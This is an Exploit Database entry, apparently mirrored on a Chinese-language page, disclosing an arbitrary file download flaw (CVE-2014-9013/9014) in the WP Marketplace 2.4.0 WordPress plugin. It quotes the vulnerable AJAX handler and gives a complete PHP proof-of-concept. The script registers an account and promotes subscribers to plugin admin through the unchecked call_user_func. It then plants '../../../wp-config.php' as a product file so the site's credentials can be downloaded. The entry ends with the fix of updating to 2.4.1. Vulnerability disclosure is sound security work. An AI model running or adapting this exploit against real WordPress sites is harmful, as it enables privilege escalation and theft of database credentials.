WordPress Plugin Marketplace 2.4.0 – Arbitrary File Download

• Exploit Database
• 13 阅读

• 作者： Kacper Szurek
  日期： 2015-03-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36466/

• # Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download
  # Date: 26-10-2014
  # Software Link: https://wordpress.org/plugins/wpmarketplace/
  # Exploit Author: Kacper Szurek
  # Contact: http://twitter.com/KacperSzurek
  # Website: http://security.szurek.pl/
  # Category: webapps
  # CVE: CVE-2014-9013 and CVE-2014-9014
  
  1. Description
  
  Anyone can run user defined function because of call_user_func.
  
  File: wpmarketplace\libs\cart.php
  
  function ajaxinit(){
  if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
  	if(function_exists($_POST['execute']))
  		call_user_func($_POST['execute'],$_POST);
  	else
  		echo __("function not defined!","wpmarketplace");
  	die();
  	}
  }
  
  http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html
  
  2. Proof of Concept
  
  $file ='../../../wp-config.php';
  $url = 'http://wordpress-url/';
  $user = 'userlogin';
  $email = 'useremail@email.email';
  $pass = 'password';
  $cookie = "/cookie.txt";
  
  $ckfile = dirname(__FILE__) . $cookie;
  $cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
  
  // Register
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');
  curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
  curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch,
  CURLOPT_POSTFIELDS,
  array(
  'register_form' => 'register',
  'reg[user_login]' => $user,
  'reg[user_email]' => $email,
  'reg[user_pass]' => $pass
  ));
  $content = curl_exec($ch);
  if (!preg_match("/success/i", $content)) {
  die("Cannot register");
  }
  // Log in
  curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');
  curl_setopt($ch,
  CURLOPT_POSTFIELDS,
  array(
  'log' => $user,
  'pwd' => $pass,
  'wp-submit' => 'Log%20In'
  ));
  $content = curl_exec($ch);
  if (!preg_match('/adminmenu/i', $content)) {
  die("Cannot login");
  }
  // Add subscriber as plugin admin
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch,
  CURLOPT_POSTFIELDS,
  array(
  'action' => 'wpmp_pp_ajax_call',
  'execute' => 'wpmp_save_settings',
  '_wpmp_settings[user_role][]' => 'subscriber'
  ));
  $content = curl_exec($ch);
  if (!preg_match('/Settings Saved Successfully/i', $content)) {
  die("Cannot set role");
  }
  // Request noonce
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch,
  CURLOPT_POSTFIELDS,
  array(
  'action' => 'wpmp_pp_ajax_call',
  'execute' => 'wpmp_front_add_product'
  ));
  $content = curl_exec($ch);
  preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);
  if (strlen($nonce[1]) < 2) {
  die("Cannot get nonce");
  }
  // Set file to download
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch,
  CURLOPT_POSTFIELDS,
  array(
  '__product_wpmp' => $nonce[1],
  'post_type' => 'wpmarketplace',
  'id' => '123456',
  'wpmp_list[base_price]' => '0',
  'wpmp_list[file][]' => $file
  ));
  $content = curl_exec($ch);
  header("Location: ".$url."?wpmpfile=123456");
  
  3. Solution:
  
  Update to version 2.4.1
  
  https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip